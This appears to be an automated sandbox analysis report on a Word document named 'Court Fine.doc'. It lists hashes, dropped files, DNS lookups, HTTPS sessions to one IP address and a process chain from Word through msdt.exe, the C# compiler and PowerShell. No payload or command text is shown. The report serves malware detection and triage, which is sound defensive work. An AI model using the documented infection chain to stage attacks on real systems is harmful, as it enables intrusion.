SHA-256: | B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2 |
SHA-512: | 2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA |
Malicious: | false |
Preview: |
C:\Windows\Temp\SDIAG_25925c22-fa60-496e-82b8-a63566c71bc1\en-US\CL_LocalizationData.psd1
Process: | C:\Windows\SysWOW64\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6650 |
Entropy (8bit): | 3.6751460885012333 |
Encrypted: | false |
SSDEEP: | 96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm |
MD5: | E877AD0545EB0ABA64ED80B576BB67F6 |
SHA1: | 4D200348AD4CA28B5EFED544D38F4EC35BFB1204 |
SHA-256: | 8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27 |
SHA-512: | 6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10752 |
Entropy (8bit): | 3.517898352371806 |
Encrypted: | false |
SSDEEP: | 96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm |
MD5: | CC3C335D4BBA3D39E46A555473DBF0B8 |
SHA1: | 92ADCDF1210D0115DB93D6385CFD109301DEAA96 |
SHA-256: | 330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD |
SHA-512: | 49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12 |
Malicious: | false |
Antivirus: |
|
Preview: |
Process: | C:\Windows\SysWOW64\msdt.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 48956 |
Entropy (8bit): | 5.103589775370961 |
Encrypted: | false |
SSDEEP: | 768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO |
MD5: | 310E1DA2344BA6CA96666FB639840EA9 |
SHA1: | E8694EDF9EE68782AA1DE05470B884CC1A0E1DED |
SHA-256: | 67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C |
SHA-512: | 62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.776614426711646 |
TrID: |
|
File name: | Court Fine.doc |
File size: | 10734 |
MD5: | 730768c4f029608adf0032e95e8e8a1d |
SHA1: | c071befaa2d7548d53dfb0f1f611c6fd1b174f46 |
SHA256: | 94fabeeeffae82a107913815c2b62e4311aeef432197e0d2d6af40a7a65cd5f1 |
SHA512: | 6540610ac9db98f6a67b81029b4e0b3f7757e9b8399ab234f50225e8ff952f81f7c213e40a819a760d795d91e2e5b78bb83fb25a9a3ce978201522be1a9f1556 |
SSDEEP: | 192:CEhMA1GheFb8c9264wpHV7Z/c+8poF1d3jvvtlFOrGxjPkfzUUy2G:Cq/1GAFbx92hwhcfa7pr1lFOyxjPkfz+ |
TLSH: | 29228D36802A5D30DAAAF774F0A45A56EC5C1482E7773DF9B016BEB389C22CE5274E40 |
File Content Preview: | PK........$k.T................_rels/PK........$k.T................docProps/PK........$k.T................word/PK........$k.T...lT... .......[Content_Types].xml...j.0.E.....6.J.(.....e.h...4NDeIh&...8NC)i.M.1.3..3...x].l..m....}....X?+...9.....F.....@1.]_. |
Icon Hash: | 74f4c4c6c1cac4d8 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 21, 2022 14:37:12.439671040 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440161943 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440220118 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440274954 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440287113 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440340996 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440378904 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440433025 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440515041 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.440524101 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440541029 CEST | 443 | 49795 | 172.67.190.5 | 192.168.2.3 |
Jul 21, 2022 14:37:12.440599918 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Jul 21, 2022 14:37:12.442114115 CEST | 49795 | 443 | 192.168.2.3 | 172.67.190.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 21, 2022 14:34:48.900882959 CEST | 65358 | 53 | 192.168.2.3 | 8.8.8.8 |
Jul 21, 2022 14:34:48.929476023 CEST | 53 | 65358 | 8.8.8.8 | 192.168.2.3 |
Jul 21, 2022 14:34:54.606348991 CEST | 53802 | 53 | 192.168.2.3 | 8.8.8.8 |
Jul 21, 2022 14:34:54.651662111 CEST | 53 | 53802 | 8.8.8.8 | 192.168.2.3 |
Jul 21, 2022 14:37:12.098706007 CEST | 60640 | 53 | 192.168.2.3 | 8.8.8.8 |
Jul 21, 2022 14:37:12.120269060 CEST | 53 | 60640 | 8.8.8.8 | 192.168.2.3 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jul 21, 2022 14:34:48.900882959 CEST | 192.168.2.3 | 8.8.8.8 | 0x939 | Standard query (0) | | A (IP address) | IN (0x0001) |
Jul 21, 2022 14:34:54.606348991 CEST | 192.168.2.3 | 8.8.8.8 | 0x5000 | Standard query (0) | | A (IP address) | IN (0x0001) |
Jul 21, 2022 14:37:12.098706007 CEST | 192.168.2.3 | 8.8.8.8 | 0x8c09 | Standard query (0) | | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jul 21, 2022 14:34:48.929476023 CEST | 8.8.8.8 | 192.168.2.3 | 0x939 | No error (0) | | | 172.67.190.5 | A (IP address) | IN (0x0001) |
Jul 21, 2022 14:34:48.929476023 CEST | 8.8.8.8 | 192.168.2.3 | 0x939 | No error (0) | | | 104.21.73.122 | A (IP address) | IN (0x0001) |
Jul 21, 2022 14:34:54.651662111 CEST | 8.8.8.8 | 192.168.2.3 | 0x5000 | No error (0) | | | 172.67.190.5 | A (IP address) | IN (0x0001) |
Jul 21, 2022 14:34:54.651662111 CEST | 8.8.8.8 | 192.168.2.3 | 0x5000 | No error (0) | | | 104.21.73.122 | A (IP address) | IN (0x0001) |
Jul 21, 2022 14:37:12.120269060 CEST | 8.8.8.8 | 192.168.2.3 | 0x8c09 | No error (0) | | | 172.67.190.5 | A (IP address) | IN (0x0001) |
Jul 21, 2022 14:37:12.120269060 CEST | 8.8.8.8 | 192.168.2.3 | 0x8c09 | No error (0) | | | 104.21.73.122 | A (IP address) | IN (0x0001) |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49726 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:49 UTC | 0 | OUT | |
2022-07-21 12:34:49 UTC | 0 | IN | |
2022-07-21 12:34:49 UTC | 1 | IN | |
2022-07-21 12:34:49 UTC | 1 | IN | |
2022-07-21 12:34:49 UTC | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.3 | 49727 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:50 UTC | 1 | OUT | |
2022-07-21 12:34:50 UTC | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.3 | 49752 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:03 UTC | 21 | OUT | |
2022-07-21 12:35:04 UTC | 21 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
11 | 192.168.2.3 | 49753 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:06 UTC | 22 | OUT | |
2022-07-21 12:35:07 UTC | 23 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
12 | 192.168.2.3 | 49795 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:37:12 UTC | 24 | OUT | |
2022-07-21 12:37:12 UTC | 24 | IN | |
2022-07-21 12:37:12 UTC | 25 | IN | |
2022-07-21 12:37:12 UTC | 25 | IN | |
2022-07-21 12:37:12 UTC | 27 | IN | |
2022-07-21 12:37:12 UTC | 28 | IN | |
2022-07-21 12:37:12 UTC | 29 | IN | |
2022-07-21 12:37:12 UTC | 31 | IN | |
2022-07-21 12:37:12 UTC | 32 | IN | |
2022-07-21 12:37:12 UTC | 33 | IN | |
2022-07-21 12:37:12 UTC | 35 | IN | |
2022-07-21 12:37:12 UTC | 36 | IN | |
2022-07-21 12:37:12 UTC | 37 | IN | |
2022-07-21 12:37:12 UTC | 39 | IN | |
2022-07-21 12:37:12 UTC | 40 | IN | |
2022-07-21 12:37:12 UTC | 41 | IN | |
2022-07-21 12:37:12 UTC | 43 | IN | |
2022-07-21 12:37:12 UTC | 44 | IN | |
2022-07-21 12:37:12 UTC | 45 | IN | |
2022-07-21 12:37:12 UTC | 47 | IN | |
2022-07-21 12:37:12 UTC | 48 | IN | |
2022-07-21 12:37:12 UTC | 49 | IN | |
2022-07-21 12:37:12 UTC | 51 | IN | |
2022-07-21 12:37:12 UTC | 52 | IN | |
2022-07-21 12:37:12 UTC | 53 | IN | |
2022-07-21 12:37:12 UTC | 55 | IN | |
2022-07-21 12:37:12 UTC | 56 | IN | |
2022-07-21 12:37:12 UTC | 57 | IN | |
2022-07-21 12:37:12 UTC | 59 | IN | |
2022-07-21 12:37:12 UTC | 60 | IN | |
2022-07-21 12:37:12 UTC | 61 | IN | |
2022-07-21 12:37:12 UTC | 63 | IN | |
2022-07-21 12:37:12 UTC | 64 | IN | |
2022-07-21 12:37:12 UTC | 65 | IN | |
2022-07-21 12:37:12 UTC | 67 | IN | |
2022-07-21 12:37:12 UTC | 68 | IN | |
2022-07-21 12:37:12 UTC | 69 | IN | |
2022-07-21 12:37:12 UTC | 71 | IN | |
2022-07-21 12:37:12 UTC | 72 | IN | |
2022-07-21 12:37:12 UTC | 73 | IN | |
2022-07-21 12:37:12 UTC | 75 | IN | |
2022-07-21 12:37:12 UTC | 76 | IN | |
2022-07-21 12:37:12 UTC | 77 | IN | |
2022-07-21 12:37:12 UTC | 79 | IN | |
2022-07-21 12:37:12 UTC | 83 | IN | |
2022-07-21 12:37:12 UTC | 87 | IN | |
2022-07-21 12:37:12 UTC | 88 | IN | |
2022-07-21 12:37:12 UTC | 92 | IN | |
2022-07-21 12:37:12 UTC | 96 | IN | |
2022-07-21 12:37:12 UTC | 100 | IN | |
2022-07-21 12:37:12 UTC | 104 | IN | |
2022-07-21 12:37:12 UTC | 109 | IN | |
2022-07-21 12:37:12 UTC | 113 | IN | |
2022-07-21 12:37:12 UTC | 117 | IN | |
2022-07-21 12:37:12 UTC | 120 | IN | |
2022-07-21 12:37:12 UTC | 124 | IN | |
2022-07-21 12:37:12 UTC | 128 | IN | |
2022-07-21 12:37:12 UTC | 132 | IN | |
2022-07-21 12:37:12 UTC | 136 | IN | |
2022-07-21 12:37:12 UTC | 141 | IN | |
2022-07-21 12:37:12 UTC | 145 | IN | |
2022-07-21 12:37:12 UTC | 149 | IN | |
2022-07-21 12:37:12 UTC | 152 | IN | |
2022-07-21 12:37:12 UTC | 156 | IN | |
2022-07-21 12:37:12 UTC | 160 | IN | |
2022-07-21 12:37:12 UTC | 164 | IN | |
2022-07-21 12:37:12 UTC | 168 | IN | |
2022-07-21 12:37:12 UTC | 173 | IN | |
2022-07-21 12:37:12 UTC | 177 | IN | |
2022-07-21 12:37:12 UTC | 181 | IN | |
2022-07-21 12:37:12 UTC | 184 | IN | |
2022-07-21 12:37:12 UTC | 188 | IN | |
2022-07-21 12:37:12 UTC | 192 | IN | |
2022-07-21 12:37:12 UTC | 196 | IN | |
2022-07-21 12:37:12 UTC | 200 | IN | |
2022-07-21 12:37:12 UTC | 205 | IN | |
2022-07-21 12:37:12 UTC | 209 | IN | |
2022-07-21 12:37:12 UTC | 213 | IN | |
2022-07-21 12:37:12 UTC | 216 | IN | |
2022-07-21 12:37:12 UTC | 220 | IN | |
2022-07-21 12:37:12 UTC | 224 | IN | |
2022-07-21 12:37:12 UTC | 228 | IN | |
2022-07-21 12:37:12 UTC | 232 | IN | |
2022-07-21 12:37:12 UTC | 237 | IN | |
2022-07-21 12:37:12 UTC | 248 | IN | |
2022-07-21 12:37:12 UTC | 253 | IN | |
2022-07-21 12:37:12 UTC | 269 | IN | |
2022-07-21 12:37:12 UTC | 280 | IN | |
2022-07-21 12:37:12 UTC | 296 | IN | |
2022-07-21 12:37:12 UTC | 312 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.3 | 49744 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:53 UTC | 3 | OUT | |
2022-07-21 12:34:54 UTC | 3 | IN | |
2022-07-21 12:34:54 UTC | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.3 | 49745 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:54 UTC | 4 | OUT | |
2022-07-21 12:34:55 UTC | 4 | IN | |
2022-07-21 12:34:55 UTC | 5 | IN | |
2022-07-21 12:34:55 UTC | 5 | IN | |
2022-07-21 12:34:55 UTC | 7 | IN | |
2022-07-21 12:34:55 UTC | 8 | IN | |
2022-07-21 12:34:55 UTC | 9 | IN | |
2022-07-21 12:34:55 UTC | 11 | IN | |
2022-07-21 12:34:55 UTC | 12 | IN | |
2022-07-21 12:34:55 UTC | 12 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.3 | 49746 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:55 UTC | 12 | OUT | |
2022-07-21 12:34:56 UTC | 13 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.3 | 49747 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:56 UTC | 14 | OUT | |
2022-07-21 12:34:57 UTC | 14 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.3 | 49748 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:34:57 UTC | 15 | OUT | |
2022-07-21 12:34:59 UTC | 15 | IN | |
2022-07-21 12:34:59 UTC | 16 | IN | |
2022-07-21 12:34:59 UTC | 17 | IN | |
2022-07-21 12:34:59 UTC | 17 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.3 | 49749 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:01 UTC | 17 | OUT | |
2022-07-21 12:35:02 UTC | 17 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.3 | 49750 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:02 UTC | 18 | OUT | |
2022-07-21 12:35:03 UTC | 19 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.3 | 49751 | 172.67.190.5 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-21 12:35:03 UTC | 20 | OUT | |
2022-07-21 12:35:03 UTC | 20 | IN |
Target ID: | 0 |
Start time: | 14:34:42 |
Start date: | 21/07/2022 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2d0000 |
File size: | 1937688 bytes |
MD5 hash: | 0B9AB9B9C4DE429473D6450D4297A123 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 1 |
Start time: | 14:34:48 |
Start date: | 21/07/2022 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe40000 |
File size: | 466688 bytes |
MD5 hash: | EA19F4A0D18162BE3A0C8DAD249ADE8C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 13 |
Start time: | 14:35:05 |
Start date: | 21/07/2022 |
Path: | C:\Windows\SysWOW64\msdt.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa30000 |
File size: | 1508352 bytes |
MD5 hash: | 7F0C51DBA69B9DE5DDF6AA04CE3A69F4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Target ID: | 23 |
Start time: | 14:36:01 |
Start date: | 21/07/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1360000 |
File size: | 2170976 bytes |
MD5 hash: | 350C52F71BDED7B99668585C15D70EEA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | moderate |
Target ID: | 24 |
Start time: | 14:36:04 |
Start date: | 21/07/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1000000 |
File size: | 43176 bytes |
MD5 hash: | C09985AE74F0882F208D75DE27770DFA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 25 |
Start time: | 14:36:20 |
Start date: | 21/07/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1360000 |
File size: | 2170976 bytes |
MD5 hash: | 350C52F71BDED7B99668585C15D70EEA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | moderate |
Target ID: | 26 |
Start time: | 14:36:23 |
Start date: | 21/07/2022 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1000000 |
File size: | 43176 bytes |
MD5 hash: | C09985AE74F0882F208D75DE27770DFA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 31 |
Start time: | 14:37:04 |
Start date: | 21/07/2022 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12e0000 |
File size: | 430592 bytes |
MD5 hash: | DBA3E6449E97D4E3DF64527EF7012A10 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |